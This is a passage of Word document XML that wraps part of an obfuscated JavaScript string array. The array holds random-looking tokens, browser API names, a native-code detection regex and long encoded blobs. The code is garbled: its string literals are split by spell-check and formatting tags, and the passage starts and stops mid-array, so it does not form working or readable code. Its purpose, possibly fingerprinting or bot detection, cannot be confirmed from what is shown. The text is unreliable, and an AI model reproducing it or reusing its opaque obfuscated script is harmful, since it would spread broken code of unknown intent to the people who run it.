JeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", "g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg","isFinite", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-", "VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>axg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", "Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", &gt;&gt;   var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y", "\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain","d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "d9MCsgbfwU_7oQ", "9CuOY_Z8COMEfKeLkQ", "configurable", "JXC5IMVyb7V_", "ExPoTYlqX8wLTZbwrQFeydcqMnIy0lSAArSdyEYxhEWSn04rMTdbN9IhtWyS4rP5GH31RR6j</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dpHJTpX_ScUNN79hVg", "2zzzSIEfSt8CFNK55mUpldYINHYqlQLjcfXD7joyxU_bhm4ram1eJ9AXojDOoP3sbzjId1Gnf96_Yt_SNqA", "Zo0ttRXq4X8", "rrFu5Ru4tFiewkVkarn6RhGX7_HzfNBTzTAXdt3wC8h-Zoiw0KC75GeaV5kpfiRStece5PZ2oGZI2HQ9tXuchy7zs8cCQEvFMGZjb84EfMzwd7DceMfWBNOFHy3c-r3wToHoRPrjju8wZzKyzVQlpdQBQTpoYx00Mcb48-nr_6JARkO-m4hccuoXN6m9s39I6fln_fP6-bgWLsDHnOITWVg9FxEN_UWgji2vVQEFgI0yGHgQ4LvDSfUE4Sg13TOI1p7503gdMGXgLtKHPdcbV1aSHJc9cGk_Sr7ZkwZdOoz9FHit8m5I68GyYuYYsWpdRyowbVw2rUhVPbZYP3ypmrLmgQoCnrE1ieUsLQE9tVwnNbb6YcBLlprUFvNpHiB_VI9GTerNW9Skm8qJgJsFU98BWkRBDOpxQwE-PK48g4EgBH6-_UV0hXHZ6mz6A0JdaXUC7UrPYPv3lA1E0BG2AT2xYXUAenmRn-zRraJCAbMAPMNgQXHZLwTtzfqlBiIYAv_6wqjtXbcN3KSOHVqrqBAmNj_YUjqNSf7qC1eEjphNbDAuhjizxGJ8LnSGJcbLstOsQtOgzvngma6fL4x_WEzmDAmptzC1e9J7dX7cs96pOHtkrrZp31TGCRycFgoJIALePS6UFhkuun6YnLgVYnqPqgXjqNrgGvFlVeMhYNwpk7pDDaDIK8Yml1ZGE4Az4gBo0J9QTN96_-hX5tBx5BegzQOskZrIRbrqI1tKdv4BLtdH5LmTdKvvoyxrCR0FPsv4-uWDHXRcg1NkgnVOGVoblZhTvXbJBUSc3wFgjzvDNw_K67eBQ-H1H8qwmY2zfa3rdkPD4glhfd1g3wvUxrnFxeBU44UVcVNzY3OvAJBb4aKw5BAh_Tj_JA8xcZ-PtPoctuB7JE6z8QLbjC10Sls0L51lmgIa8PrHg8_xJTnA7nqgPKa_0MJoUq3uN6MHHEaeMvWSS2RzNv0gvPHEJKbXiuRCeSf9uXKnH8hwE136DNk1pmhE0dfxQOd9ERe9vj61FtNXeGUTXuB-Mlb7cUeeFgBrEoAHLOxuiKtrsvUqSDIUZ8ErLDgErFHbc0CnqmpCQyCycFNU2mPpiAY52bfaFDsBaYLy7UR1DRAXI4p5ar-8dBRVHvMDE1N9aS2kRBGHbW69u9ubvERwgVsEYiVFsxDqa3f7UMrv_t3--fHYAIyFy_R5Tz94TERj2nJCpatV1qrfYYk9tu0Wh-hBekQryBSWXGYUvx_DhIHkeVgsvlLoq9jGPC-_RYc1KlGLbQdS65vpIIDbM66I_C08tw-Y91GotdlP_ssSlEl0FujZy94hBKacDPu53LajqoDlgWOhKpzv1bkZe0sNOLMNoEEuB7UzHOOzyKslJNLpxTx3yqy79HDsE7A9WLAOovLAMON_L4FKnOFX2l_9N2ajn-D64TQylqlcrbG6mTg_UCrdHx_nKAsVm3Qzy8YjnOMQGRCixVlMtMhvXOVHtu-fvMGLX41NC4S09DeB5oCh_urcx9KR8KSRIFhaCTtJn-oTQlutcxKH5Ao32Tzha1XX1wPE5eiQ6-LrVZgEQiUcUKHZJ4dgfyrBHYCsorIb_PX6QsrW3R9vK0PmkRZtuoz__xsa5z-Zc1sVFdm3S_iJq7DWx66VnoqhDMfqK4rhzVe7r9pmbF9Jugj2ya_YP-v7_0r-9cSLbJRE28BBDvqZ5rnJpeGjz-WqDQ__nmeAYjcZcN40WxI6hU81mbBpXA6RvFEqgIR1i0l_Hmewkx3ABrE9lJ95U5__rthBQcS5fsIDTecK9oixzyHTHeQ-lN-c3CpwZLtH16r_0hbootQX038z4OU1QipYoxHDJ9Iqzis0pnoadVoME9ap6U0aeFSCw1gkIFcqkTcyuPbDCKaqx7Yr1Bahgi87BuofsBHg6SPb57i23_vNf7z77SDuVyCRKo5lbgOoY_R2eaI3WiUYhAobVjNTwcp2_pBf2bY74Kg-HSNRG46uGR4iby_J10QDg1tOWQtTvhcPjCLmr3Ucb-437Z9-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tQ8BTnm4HYuQojk_i1mvsmahuTJCK6cbZKjxOitmuuG3auaKpE2PbAFaQbymWEj0TH4vEuqyNYuy5yb5oMdG5l-FztQEVI7sWKsZILXJu7uXLsvUO18DiJhBoMvdLNXQKlMfizJb_QG2EEspMpEIVy8GShymsVORDmq33NOokDIqwYxsXg6aZtknsFWvTOv0paZ-BD70j17KFIiTp552_Raos7BFHcgsY_v4D46sA8CtZo0_lglJWMlDrRZkVPlfmcorkhRHSZmewXQMdwIhO7B2nmvcHmAEUQz8YDXDJ3ZpUuj9oEtMb_BNCUc94Z4RAdCAMT7QUIGisS0CB_dInj9clJkJeaB8WvXaEBfPT-7pi8XP6rUXA5AxUMmrGG7TBWrV5UlqG5eEgEv3lfo3uAlFQ7HI8dNS2xr4nN_LsPJZmv0JlLPqXdV3fhzk7GaCO0kzfUbno3beo8DwOEhCblIhquyaRVWwwGupay_LvafHcDpgWOqJsFxHPFYYVbxtI9z8q78yfovXzi7IH_RV5WozfdDpF6J3JknwXJuZSmv7IAfq6vPulZt7gJAWwoBeW_U9AKYlDyuOijtNsxAXoCRjx8PK_DNvEQQggDFmY3Fsw6OpiJ7-stG0bf17enkIZPt3G2Kzxnv9NqRvLmJtxkFXhAdI5Oht2s24SQmCVYnezypJ0LJSEZ91FII6ibw3vznavP8xuR4q8nnoop-RURn6FqExbAGJFQxtNGkgEiLzqrmJii-URl-H6JuwKwBeABH4VQCEmQQRbDVsN738CYIJXZhpsV5EigmxpUYOu1RRMJBq3BMsCFbzV69FyLrgBxuR0ycO-lsA4rEr1GVkZLV7DpkCPdpP24LjI29fgcW4QpgPteAkAOEHrLtiA5Bj4c8dAH6177a30aUjHi1zWaNy15TxzMx9uXcXy7UAwnhdLohkVdOP1y8IcPnjNKCF4ulSoo6VSUipIUf8iVcOI_NmlZD_-46MjjkNEriKkzG1jRfr8Clh_86YgZ7kOSgZEvqmbTfokTwRAmHY4thzc-BbIyK4qnHLxUpNDTgJ-HLIyRZlODonWi2ncL4DwB04rn-KFonKicToH-Zl_1_DwaMl6-YXHZ0Uqzxk-Q15co-N4VpOTK0IuAyMKmDVha7Y71V9vTf0x-ILfqCEO36xFdLaNJ_FA7QluR3NLcKuvbwP0ljy-fc4YpJCjEKFlRbyguXR1YyGbUnLCOHjxHMwKUK8Bf0J774lvJ5JiDn8l-XHePo9YRaraqtH9zI", "Z8R7oAyQpwu-", "bFzjFrYVO9lTC8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GmvnTZkAK_dPCNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "-tg8s1nt_BKS3FYSLO-mEA_R66KiPp8QyXVOL4c", "aTPjYYc5GJMBU9OKsw", "oyTtD5oxM8B1MY22jG4", "e0buMYEyB_pcRo7y", "TBKaOZ8yW_ltHqfxxBBpkg", "NcwHlnfu-w3_", "nJMEmmPAsC2suCN_DJbTZg", "F2LmQp4UfMAFEIez-gB-yQ", "VPUouyHp6n_evhwyHK_iQA", "File", "global", "1WOfOeBzPOEdWMPIxg", "pXH-J681G8Ib", "yRv5T7MGC9w7bp62", "closed", "f5U4kDGL8UbPugIaXLrMKgM", "xxTnF5ghPs4d", "3MQymkTO4wL731Bqf4_rVzTFwa7sHIgC5nwCIcLLBcBPB9fi-dPRvRjNLPURWXx8-w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LuU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "nbs-9grOoAXlhg", "oWLRV7w1B_5KYviS", "iIJt8ne4oQ", "-SeRL_1qRI8", "dhjdQLYbFao3d_W2mwNX5ec_UDYanCOv", "b4sv_VvoihqN6BlBd5imSByuwO3yYuUQxW0", "4_ca6VGgjw", "m3GWLot5Yw", "u071ZK0_GIRy", "stringify", "r-Q", "_1GtQ85oFQ", "Zz3ODugvDeomc_C3_RpA8K0DMktggmeqZeTjtBBHghnGg05jC0NXAJ8G-yjXtA", "b5Bf5C2z5nOuvms6EfeXJHS1lc-dPrxnm0AoGfWMMeA4fJndj_yvnGqEVJ51Ol9O1YhI8PoE1GUQxXVk1UyghDOfsg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SxePAfwLacANNaE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "Promise", "aGHiZoY5", "X-JLwCmI5Xr0vDg1SNWCP3T_jIiXErwqqVJ0CIzScOxbVLiT9_GZmg_0L-ZBLEow3I9Mn54JxA0sthhE0Rn_-QrWgeshZye9SQMBEKpzFKXUUw", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"Xl3xGPMHLb85LbvDkw", "Event", "-0nAK6otDoFHJfnQ2RNU4IY", "9uI", "z8ciuF3n7y75glxHPrvyYjid6_L7c91Jrw", "maIt21jK0GqB1A", "_rVr4xS2jGmq71VzWa_HUSc", "YEKMQ-V_FZ1XQ9HQvg8-7No7WA", "OyjCU9MaJc0xLqP22RdwgrYwMEhM2mD4I4uj2Wtg6EjqqwcGYFk8b6Ir-z-M66z6TyCVJWiIOezhbqmJPg", "R5Vtxh2Ox0bT", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MowAhXLKqiA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "t8lHsBejmnPb", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>YXTtXg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
